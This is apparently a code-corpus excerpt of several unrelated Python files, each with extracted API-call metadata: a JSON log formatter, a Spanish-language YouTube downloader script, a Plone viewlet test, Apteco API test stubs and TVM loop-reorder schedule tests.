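#   handler.setFormatter(RequestIdJsonLogFormatter('%(timestamp)s %(level)s %(name)s %(message)s'))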
class RequestIdJsonLogFormatter(pythonjsonlogger.jsonlogger.JsonFormatter):
def add_fields(self, log_record, record, message_dict):
super(RequestIdJsonLogFormatter, self).add_fields(log_record, record, message_dict)
if not log_record.get('timestamp'):
# this doesn't use record.created, so it is slightly off
            now = datetime.datetime.now(datetime.timezone.utc).isoformat()
log_record['timestamp'] = now
if log_record.get('level'):
log_record['level'] = log_record['level'].upper()
else:
log_record['level'] = record.levelname
if not log_record.get('name'):
log_record['name'] = record.name
if not log_record.get('threadName'):
log_record['threadName'] = record.threadName
|
[
"wsgi_microservice_middleware.env.bool",
"traceback.walk_stack",
"datetime.datetime.utcnow",
"logging.LoggerAdapter",
"wsgi_microservice_middleware.env.str",
"logging.getLogger"
] |
[((276, 303), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (293, 303), False, 'import logging\n'), ((331, 404), 'wsgi_microservice_middleware.env.str', 'wsgi_microservice_middleware.env.str', (['"""REQUEST_ID_HEADER"""', '"""X-Request-Id"""'], {}), "('REQUEST_ID_HEADER', 'X-Request-Id')\n", (367, 404), False, 'import wsgi_microservice_middleware\n'), ((418, 475), 'wsgi_microservice_middleware.env.bool', 'wsgi_microservice_middleware.env.bool', (['"""LOG_TOKENS"""', '(True)'], {}), "('LOG_TOKENS', True)\n", (455, 475), False, 'import wsgi_microservice_middleware\n'), ((2600, 2626), 'traceback.walk_stack', 'traceback.walk_stack', (['None'], {}), '(None)\n', (2620, 2626), False, 'import traceback\n'), ((2090, 2132), 'logging.LoggerAdapter', 'logging.LoggerAdapter', (['logger'], {'extra': 'extra'}), '(logger, extra=extra)\n', (2111, 2132), False, 'import logging\n'), ((4063, 4089), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4087, 4089), False, 'import datetime\n')]
|
# rattube.py
#
# Copyright 2020 <NAME> <<EMAIL>>
#
from termcolor import cprint
from pyfiglet import figlet_format
from pytube import YouTube
import time
from os import system, name
import sys
from colorama import init
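# strip ANSI color codes when stdout is not attached to a terminal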
init(strip=not sys.stdout.isatty())
class RatTube:
def limpiar_Pantalla(self):
if name == "nt":
_ = system('cls')
else:
_ = system('clear')
    ''' This method checks whether the platform is NT (Windows) or Linux.
    Based on the boolean the check returns, it runs the command used on that
    platform to clear the console'''
def mostrar_Banner(self):
cprint(figlet_format('RatTube', font='banner3'), 'yellow', 'on_blue', attrs=['bold'])
    '''Prints the banner shown on screen.
    The cprint method takes the text, the text color and the background the text will have;
    attrs refers to the font attribute, here bold.
    The text the cprint method receives is what you get from
    formatting it with the figlet_format method, which turns it into ascii art and lets us
    choose among the fonts bundled with the pyfiglet library'''
def limpiar_Mostrar_Banner(self):
self.limpiar_Pantalla()
self.mostrar_Banner()
    '''This method clears the screen and shows the banner.
    The two methods are called together because most call sites need the
    banner to stay on a clean screen, keeping the focus
    on the download task'''
def confirmar_Descargar(self):
        url = input('\n\nEnter the video URL: ')
        ruta = input('\nWhere on your machine will you save the file\n(if you leave it empty, it is saved in the script directory)? ')
yt = YouTube(url, on_progress_callback=self.progress_function)
print("\n", yt.title)
global video
video = yt.streams.first()
size1 = str(round(video.filesize / (1024 * 1024)))
print("\nTamaño del video: ", size1, " MB aprox.")
video.download(ruta)
        tecla = input("\nPress any key to finish")
time.sleep(3)
print("\n\nAdiós")
'''Este método hace uso de la biblioteca pytube,de la clase Youtube y sus métodos.
Permite realizar la descarga del video, pideo una url y la ruta de guardado
por defecto se guarda en la carpeta donde esté el script'''
    def progress_function(self, stream, chunk, file_handle, bytes_remaining):
        # pytube progress callback (old four-argument signature); it needs
        # self because it is passed above as a bound method
        print(round((1 - bytes_remaining / video.filesize) * 100, 3), '% done...')
def descargar(self):
self.limpiar_Mostrar_Banner()
print("""\n\n1. Ingresar URL del video
2. Volver""")
opcion = input("\nElija una opción: ")
if opcion == "1":
self.confirmar_Descargar()
else:
self.limpiar_Mostrar_Banner()
self.mostrar_Menu(self.descargar, self.salir)
        '''This method confirms that we really want to enter the video URL.
        If we have not made a mistake, we confirm entering the URL; if not,
        we can choose to go back, which runs limpiar_Mostrar_Banner
        and calls the initial menu again'''
def salir(self):
self.limpiar_Pantalla()
sys.exit()
    '''This method runs if we choose exit in the menu.
    It lets us end the script without a keyboard interrupt'''
def mostrar_Menu(self, descargar, salir):
print("""\n1. Descargar video de Youtube
2. Salir""")
choice = input("\nElija un opción: ")
opciones = {"1": self.descargar, "2": self.salir}
if choice == "1":
eleccion = opciones[choice]()
while choice not in opciones:
print("\nNo se reconoce la opción")
time.sleep(5)
self.limpiar_Mostrar_Banner()
self.mostrar_Menu(self.descargar, self.salir)
else:
eleccion = opciones[choice]()
'''Muestra el menú inicial.
Llama desde aquí a los métodos necesarios para ejecutar las acciones
de descarga o de salida del script'''
rata = RatTube()
rata.limpiar_Pantalla()
rata.mostrar_Banner()
rata.mostrar_Menu(rata.descargar, rata.salir)
|
[
"pytube.YouTube",
"os.system",
"pyfiglet.figlet_format",
"time.sleep",
"sys.stdout.isatty",
"sys.exit"
] |
[((1803, 1860), 'pytube.YouTube', 'YouTube', (['url'], {'on_progress_callback': 'self.progress_function'}), '(url, on_progress_callback=self.progress_function)\n', (1810, 1860), False, 'from pytube import YouTube\n'), ((2136, 2149), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (2146, 2149), False, 'import time\n'), ((3222, 3232), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3230, 3232), False, 'import sys\n'), ((249, 268), 'sys.stdout.isatty', 'sys.stdout.isatty', ([], {}), '()\n', (266, 268), False, 'import sys\n'), ((351, 364), 'os.system', 'system', (['"""cls"""'], {}), "('cls')\n", (357, 364), False, 'from os import system, name\n'), ((382, 397), 'os.system', 'system', (['"""clear"""'], {}), "('clear')\n", (388, 397), False, 'from os import system, name\n'), ((676, 716), 'pyfiglet.figlet_format', 'figlet_format', (['"""RatTube"""'], {'font': '"""banner3"""'}), "('RatTube', font='banner3')\n", (689, 716), False, 'from pyfiglet import figlet_format\n'), ((3712, 3725), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (3722, 3725), False, 'import time\n')]
|
# encoding: utf-8
# Copyright 2012 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
from ipdasite.theme.testing import IPDA_SITE_THEME_INTEGRATION_TESTING
from Products.Five.browser import BrowserView as View
from zope.component import getMultiAdapter
from zope.viewlet.interfaces import IViewlet, IViewletManager
import unittest2 as unittest
class ViewletTest(unittest.TestCase):
layer = IPDA_SITE_THEME_INTEGRATION_TESTING
def setUp(self):
self.context = self.layer['portal']
self.request = self.layer['app'].REQUEST
self.view = View(self.context, self.request)
def testViewletInterfaces(self):
'''Ensure viewlet classes implement proper interfaces'''
from ipdasite.theme.browser.agencies import AgenciesViewlet
        self.assertTrue(IViewlet.implementedBy(AgenciesViewlet))
def test_suite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
[
"unittest2.defaultTestLoader.loadTestsFromName",
"zope.viewlet.interfaces.IViewlet.implementedBy",
"Products.Five.browser.BrowserView",
"unittest2.main"
] |
[((915, 969), 'unittest2.defaultTestLoader.loadTestsFromName', 'unittest.defaultTestLoader.loadTestsFromName', (['__name__'], {}), '(__name__)\n', (959, 969), True, 'import unittest2 as unittest\n'), ((1002, 1041), 'unittest2.main', 'unittest.main', ([], {'defaultTest': '"""test_suite"""'}), "(defaultTest='test_suite')\n", (1015, 1041), True, 'import unittest2 as unittest\n'), ((617, 649), 'Products.Five.browser.BrowserView', 'View', (['self.context', 'self.request'], {}), '(self.context, self.request)\n', (621, 649), True, 'from Products.Five.browser import BrowserView as View\n'), ((844, 883), 'zope.viewlet.interfaces.IViewlet.implementedBy', 'IViewlet.implementedBy', (['AgenciesViewlet'], {}), '(AgenciesViewlet)\n', (866, 883), False, 'from zope.viewlet.interfaces import IViewlet, IViewletManager\n')]
|
# coding: utf-8
"""
Apteco API
An API to allow access to Apteco Marketing Suite resources # noqa: E501
The version of the OpenAPI document: v2
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import apteco_api
from apteco_api.api.user_reset_password_requests_api import UserResetPasswordRequestsApi # noqa: E501
from apteco_api.rest import ApiException
class TestUserResetPasswordRequestsApi(unittest.TestCase):
"""UserResetPasswordRequestsApi unit test stubs"""
def setUp(self):
self.api = apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi() # noqa: E501
def tearDown(self):
pass
def test_user_reset_password_requests_confirm_reset_password_request(self):
"""Test case for user_reset_password_requests_confirm_reset_password_request
Confirms a given reset password request and changes the password # noqa: E501
"""
pass
def test_user_reset_password_requests_create_reset_password_request(self):
"""Test case for user_reset_password_requests_create_reset_password_request
Creates a new reset password requests, which will check that the provided email address exists and then issue a confirmation notification # noqa: E501
"""
pass
def test_user_reset_password_requests_get_reset_password_request(self):
"""Test case for user_reset_password_requests_get_reset_password_request
Requires OrbitAdmin: Returns details for a given reset password request # noqa: E501
"""
pass
def test_user_reset_password_requests_get_reset_password_requests(self):
"""Test case for user_reset_password_requests_get_reset_password_requests
Requires OrbitAdmin: Returns all the current reset password requests in the system. # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi"
] |
[((1974, 1989), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1987, 1989), False, 'import unittest\n'), ((611, 689), 'apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi', 'apteco_api.api.user_reset_password_requests_api.UserResetPasswordRequestsApi', ([], {}), '()\n', (687, 689), False, 'import apteco_api\n')]
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-function-docstring,missing-module-docstring
import sys
import pytest
import tvm
from tvm import tir
from tvm.script import ty
from tvm.tir.schedule.testing import verify_trace_roundtrip
# pylint: disable=no-member,invalid-name,unused-variable
@tvm.script.tir
def elementwise(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
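# The next fixture binds vl = l * 16, a non-affine binding that reorder must reject.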
@tvm.script.tir
def elementwise_not_affine(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for i, j, k, l in tir.grid(128, 128, 128, 8):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l * 16)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
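# The next fixture makes an inner loop extent depend on the outer loop var i, so reorder must reject it.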
@tvm.script.tir
def elementwise_dependent_loop(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for i in tir.serial(0, 128):
for j, k, l in tir.grid(128, i, 128):
with tir.block([128, 128, i, 128], "B") as [vi, vj, vk, vl]:
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
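# The next fixture guards its block with a predicate; reorder has to preserve it.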
@tvm.script.tir
def elementwise_predicate(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for i, j, k, l in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_non_single_branch(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128))
C = tir.alloc_buffer((128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128))
for i, j in tir.grid(128, 128):
for k in tir.serial(0, 128):
with tir.block([128, 128, 128], "C") as [vi, vj, vk]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
C[vi, vj, vk] = A[vi, vj, vk] * 2.0
for k in tir.serial(0, 128):
with tir.block([128, 128, 128], "B") as [vi, vj, vk]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
B[vi, vj, vk] = C[vi, vj, vk] * 2.0
@tvm.script.tir
def elementwise_with_loops_not_same_scope(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128))
for i, j in tir.grid(128, 128):
with tir.block([128, 128], "A") as [vi, vj]:
tir.bind(vi, i)
tir.bind(vj, j)
for k in tir.serial(0, 128):
with tir.block([128], "B") as [vk]:
tir.bind(vk, k)
tir.reads([A[vi, vj, vk]])
tir.writes([B[vi, vj, vk]])
B[vi, vj, vk] = A[vi, vj, vk] * 2.0
@tvm.script.tir
def elementwise_with_wrong_block_var_type(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128))
for i, j, k in tir.grid(128, 128, 128):
with tir.block([128, 128, tir.scan_axis(0, 128)], "B") as [vi, vj, vk]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.reads([A[vi, vj, vk]])
tir.writes([B[vi, vj, vk]])
B[vi, vj, vk] = A[vi, vj, vk] * 2.0
@tvm.script.tir
def elementwise_reordered(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for l, j, k, i in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_reordered2(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for k, j, i, l in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
@tvm.script.tir
def elementwise_reordered_with_predicate(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, (128, 128, 128, 128))
B = tir.match_buffer(b, (128, 128, 128, 128))
for l, j, k, i in tir.grid(128, 128, 128, 128):
with tir.block([128, 128, 128, 128], "B") as [vi, vj, vk, vl]:
tir.where(i * 2097152 + j * 16384 + k * 128 + l < 100)
tir.bind(vi, i)
tir.bind(vj, j)
tir.bind(vk, k)
tir.bind(vl, l)
B[vi, vj, vk, vl] = A[vi, vj, vk, vl] * 2.0
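# The fixtures below use opaque buffer access (tir.store / tvm_fill_fragment intrinsics).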
@tvm.script.tir
def opaque_access(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [16, 16], "float32")
B = tir.match_buffer(b, [16, 16], "float32")
with tir.block([16, 16], "A") as [vi, vj]:
tir.reads([])
tir.writes([A[0:16, 0:16]])
tir.store(A.data, vi * 16 + vj, 1)
with tir.block([16, 16], "B") as [vi, vj]:
tir.reads([])
tir.writes([B[0:16, 0:16]])
tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle"))
@tvm.script.tir
def opaque_access_reorder(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [16, 16], "float32")
B = tir.match_buffer(b, [16, 16], "float32")
for j, i in tir.grid(16, 16):
with tir.block([16, 16], "A") as [vi, vj]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.reads([])
tir.writes([A[0:16, 0:16]])
tir.store(A.data, vi * 16 + vj, 1)
for j, i in tir.grid(16, 16):
with tir.block([16, 16], "B") as [vi, vj]:
tir.bind(vi, i)
tir.bind(vj, j)
tir.reads([])
tir.writes([B[0:16, 0:16]])
tir.evaluate(tir.tvm_fill_fragment(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype="handle"))
# pylint: enable=no-member,invalid-name,unused-variable
def test_reorder():
sch = tir.Schedule(elementwise, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
sch.reorder(l, i)
tvm.ir.assert_structural_equal(elementwise_reordered, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=elementwise)
def test_reorder2():
sch = tir.Schedule(elementwise, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
sch.reorder(k, i, l)
tvm.ir.assert_structural_equal(elementwise_reordered2, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=elementwise)
def test_reorder_with_opaque_access():
sch = tir.Schedule(opaque_access, debug_mask="all")
block_a = sch.get_block("A")
i, j = sch.get_loops(block_a)
sch.reorder(j, i)
block_b = sch.get_block("B")
i, j = sch.get_loops(block_b)
sch.reorder(j, i)
tvm.ir.assert_structural_equal(opaque_access_reorder, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=opaque_access)
def test_reorder_with_predicate():
sch = tir.Schedule(elementwise_predicate, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
sch.reorder(l, i)
tvm.ir.assert_structural_equal(elementwise_reordered_with_predicate, sch.mod["main"])
verify_trace_roundtrip(sch=sch, mod=elementwise_predicate)
def test_reorder_fail_with_multi_appearance_loops():
sch = tir.Schedule(elementwise, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i, i)
def test_reorder_fail_with_non_single_branch_loop():
sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all")
block_b = sch.get_block("B")
i, j, k = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i)
sch = tir.Schedule(elementwise_non_single_branch, debug_mask="all")
block_b = sch.get_block("B")
block_c = sch.get_block("C")
i, j, k1 = sch.get_loops(block_b)
_, _, k2 = sch.get_loops(block_c)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k1, i, k2)
def test_reorder_fail_with_loops_not_under_same_scope():
sch = tir.Schedule(elementwise_with_loops_not_same_scope, debug_mask="all")
block_b = sch.get_block("B")
block_a = sch.get_block("A")
i, j = sch.get_loops(block_a)
k = sch.get_loops(block_b)[0]
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i)
def test_reorder_fail_with_wrong_block_var_type():
sch = tir.Schedule(elementwise_with_wrong_block_var_type, debug_mask="all")
block_b = sch.get_block("B")
i, j, k = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(k, i)
def test_reorder_fail_with_dependent_loops():
sch = tir.Schedule(elementwise_dependent_loop, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(l, i)
def test_reorder_fail_not_affine_bindings():
sch = tir.Schedule(elementwise_not_affine, debug_mask="all")
block_b = sch.get_block("B")
i, j, k, l = sch.get_loops(block_b)
with pytest.raises(tvm.tir.ScheduleError):
sch.reorder(l, i)
if __name__ == "__main__":
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
[
"tvm.tir.match_buffer",
"tvm.tir.tvm_fill_fragment",
"tvm.tir.scan_axis",
"tvm.tir.store",
"tvm.ir.assert_structural_equal",
"tvm.tir.writes",
"pytest.main",
"pytest.raises",
"tvm.tir.block",
"tvm.tir.bind",
"tvm.tir.serial",
"tvm.tir.Schedule",
"tvm.tir.alloc_buffer",
"tvm.tir.where",
"tvm.tir.schedule.testing.verify_trace_roundtrip",
"tvm.tir.grid",
"tvm.tir.reads"
] |
[((1135, 1176), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (1151, 1176), False, 'from tvm import tir\n'), ((1185, 1226), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (1201, 1226), False, 'from tvm import tir\n'), ((1436, 1477), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (1452, 1477), False, 'from tvm import tir\n'), ((1486, 1527), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (1502, 1527), False, 'from tvm import tir\n'), ((1550, 1576), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(8)'], {}), '(128, 128, 128, 8)\n', (1558, 1576), False, 'from tvm import tir\n'), ((1916, 1957), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (1932, 1957), False, 'from tvm import tir\n'), ((1966, 2007), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (1982, 2007), False, 'from tvm import tir\n'), ((2021, 2039), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (2031, 2039), False, 'from tvm import tir\n'), ((2309, 2350), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (2325, 2350), False, 'from tvm import tir\n'), ((2359, 2400), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (2375, 2400), False, 'from tvm import tir\n'), ((2423, 2451), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (2431, 2451), False, 'from tvm import tir\n'), ((2744, 2780), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128)'], {}), '(a, (128, 128, 128))\n', (2760, 2780), False, 'from tvm import tir\n'), ((2789, 2822), 'tvm.tir.alloc_buffer', 'tir.alloc_buffer', (['(128, 128, 128)'], {}), '((128, 128, 128))\n', (2805, 2822), False, 'from tvm import tir\n'), ((2831, 2867), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128)'], {}), '(b, (128, 128, 128))\n', (2847, 2867), False, 'from tvm import tir\n'), ((2884, 2902), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)'], {}), '(128, 128)\n', (2892, 2902), False, 'from tvm import tir\n'), ((3511, 3547), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128)'], {}), '(a, (128, 128, 128))\n', (3527, 3547), False, 'from tvm import tir\n'), ((3556, 3592), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128)'], {}), '(b, (128, 128, 128))\n', (3572, 3592), False, 'from tvm import tir\n'), ((3609, 3627), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)'], {}), '(128, 128)\n', (3617, 3627), False, 'from tvm import tir\n'), ((4123, 4159), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128)'], {}), '(a, (128, 128, 128))\n', (4139, 4159), False, 'from tvm import tir\n'), ((4168, 4204), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128)'], {}), '(b, (128, 128, 128))\n', (4184, 4204), False, 'from tvm import tir\n'), ((4224, 4247), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)'], {}), '(128, 128, 128)\n', (4232, 4247), False, 'from tvm import tir\n'), ((4629, 4670), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (4645, 4670), False, 'from tvm 
import tir\n'), ((4679, 4720), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (4695, 4720), False, 'from tvm import tir\n'), ((4743, 4771), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (4751, 4771), False, 'from tvm import tir\n'), ((5102, 5143), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (5118, 5143), False, 'from tvm import tir\n'), ((5152, 5193), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (5168, 5193), False, 'from tvm import tir\n'), ((5216, 5244), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (5224, 5244), False, 'from tvm import tir\n'), ((5589, 5630), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '(128, 128, 128, 128)'], {}), '(a, (128, 128, 128, 128))\n', (5605, 5630), False, 'from tvm import tir\n'), ((5639, 5680), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '(128, 128, 128, 128)'], {}), '(b, (128, 128, 128, 128))\n', (5655, 5680), False, 'from tvm import tir\n'), ((5703, 5731), 'tvm.tir.grid', 'tir.grid', (['(128)', '(128)', '(128)', '(128)'], {}), '(128, 128, 128, 128)\n', (5711, 5731), False, 'from tvm import tir\n'), ((6120, 6160), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '[16, 16]', '"""float32"""'], {}), "(a, [16, 16], 'float32')\n", (6136, 6160), False, 'from tvm import tir\n'), ((6169, 6209), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '[16, 16]', '"""float32"""'], {}), "(b, [16, 16], 'float32')\n", (6185, 6209), False, 'from tvm import tir\n'), ((6649, 6689), 'tvm.tir.match_buffer', 'tir.match_buffer', (['a', '[16, 16]', '"""float32"""'], {}), "(a, [16, 16], 'float32')\n", (6665, 6689), False, 'from tvm import tir\n'), ((6698, 6738), 'tvm.tir.match_buffer', 'tir.match_buffer', (['b', '[16, 16]', '"""float32"""'], {}), "(b, [16, 16], 'float32')\n", (6714, 6738), False, 'from tvm import tir\n'), ((6755, 6771), 'tvm.tir.grid', 'tir.grid', (['(16)', '(16)'], {}), '(16, 16)\n', (6763, 6771), False, 'from tvm import tir\n'), ((7009, 7025), 'tvm.tir.grid', 'tir.grid', (['(16)', '(16)'], {}), '(16, 16)\n', (7017, 7025), False, 'from tvm import tir\n'), ((7391, 7434), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise'], {'debug_mask': '"""all"""'}), "(elementwise, debug_mask='all')\n", (7403, 7434), False, 'from tvm import tir\n'), ((7534, 7604), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['elementwise_reordered', "sch.mod['main']"], {}), "(elementwise_reordered, sch.mod['main'])\n", (7564, 7604), False, 'import tvm\n'), ((7609, 7657), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'elementwise'}), '(sch=sch, mod=elementwise)\n', (7631, 7657), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((7691, 7734), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise'], {'debug_mask': '"""all"""'}), "(elementwise, debug_mask='all')\n", (7703, 7734), False, 'from tvm import tir\n'), ((7837, 7908), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['elementwise_reordered2', "sch.mod['main']"], {}), "(elementwise_reordered2, sch.mod['main'])\n", (7867, 7908), False, 'import tvm\n'), ((7913, 7961), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'elementwise'}), '(sch=sch, 
mod=elementwise)\n', (7935, 7961), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((8013, 8058), 'tvm.tir.Schedule', 'tir.Schedule', (['opaque_access'], {'debug_mask': '"""all"""'}), "(opaque_access, debug_mask='all')\n", (8025, 8058), False, 'from tvm import tir\n'), ((8241, 8311), 'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['opaque_access_reorder', "sch.mod['main']"], {}), "(opaque_access_reorder, sch.mod['main'])\n", (8271, 8311), False, 'import tvm\n'), ((8316, 8366), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'opaque_access'}), '(sch=sch, mod=opaque_access)\n', (8338, 8366), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((8414, 8467), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_predicate'], {'debug_mask': '"""all"""'}), "(elementwise_predicate, debug_mask='all')\n", (8426, 8467), False, 'from tvm import tir\n'), ((8567, 8657), 